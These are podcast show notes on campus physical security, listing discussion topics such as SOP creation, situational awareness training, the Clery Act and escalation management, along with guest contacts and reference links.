Us! Liana McCrea: @GeecheeThreat (Twitter) + LinkedIn Garrison Yap: Garrisony75 (Twitter) + LinkedIn What is physical security? How to keep your facilities and devices safe from on-site attackers | CSO Online Physical security - Wikipedia 5 Ways IT Managers Can Work with Their Physical Security Counterpart (stanleysecuritysolutions.com) 12 Security Camera System Best Practices – Cyber Safe (een.com) What is Physical Security? Measures & Planning Guide + PDF (openpath.com) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://brakesec.com/pandora #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Bios for guests Reparations.tech *Public Safety Coordinators -Field Operations (Road Incidents) -Specialized Buildings (The Library, Medical Facilities, CCR) *Public Safety Officers A. Discuss Training -SOP Creation *SOPs are very custom and dependent on the organization. There are no "NIST" standards.[IN CYBER: Frameworks for Physical Security ---> ] *Think on your feet, many plans often get thrown out the window. *Creating policies due to unforeseen incidents -Physical Security Assessments: Fire Panels, AED, Roof Accesses *The Checklist: Baseline configuration of the operations for a building *Locksmith Troubleshooting *Lack of Funding (Historically) + Ways to Address this In-House Talking to Strangers: What We Should Know about the People We Don't Know: Gladwell, Malcolm: 9780316478526: Amazon.com: Books Situational Awareness (?) "What is Situational Awareness?" -There's a lack of good training to discuss their own physical security *Ph.Ds leaving car doors wide open, blaming safety officers when they mess up *Common sense is not so common *Scenarios don't always cover every event *Dead bodies, car accidents, people streaking (lol), medical issues-Policies can be simple, like opening a car door *Need to vet whether the person is actually their car Have you seen both good and bad training on situational awareness? Does it seem to differ between physical and cyber security? Summary of the Clery Act | Clery Center"The Clery Act is a consumer protection law that aims to provide transparency around campus crime policy and statistics. In order to comply with Clery Act requirements, colleges and universities must understand what the law entails, where their responsibilities lie, and what they can do to actively foster campus safety." C.Real Life examples of Physical Security Blunders Death of Elisa Lam - Wikipedia Crime Scene: The Vanishing at the Cecil Hotel - Wikipedia STORY: Person called a SOC, asked to get into their car ( but not their vehicle) Performing multiple sweeps of common areas to prevent squatting Staff "tripping" alarms Deceased Faculty + No Sleeping Policy Working as a Team *Escalation Management *Police are often increase tensions when de-escalation is needed. *Working as a team *Locksmith Team + Public Safety Team *Looking for talent in unexpected places to transfer over to CyberSecurity (Build the Bridge) Lockpicking Community: [insert folks on twitter / youtube] companies heading back to work What should IT or Security think about for your businesses that may not have had people in for 6-9 months? If companies don't have cameras or physical controls, should they think about looking at improving? Connect with Us! Liana McCrea: @GeecheeThreat (Twitter) + LinkedInGarrison Yap: Garrisony75 (Twitter) + LinkedIn What is physical security? How to keep your facilities and devices safe from on-site attackers | CSO Online Physical security - Wikipedia 5 Ways IT Managers Can Work with Their Physical Security Counterpart (stanleysecuritysolutions.com) 12 Security Camera System Best Practices – Cyber Safe (een.com) What is Physical Security? Measures & Planning Guide + PDF (openpath.com)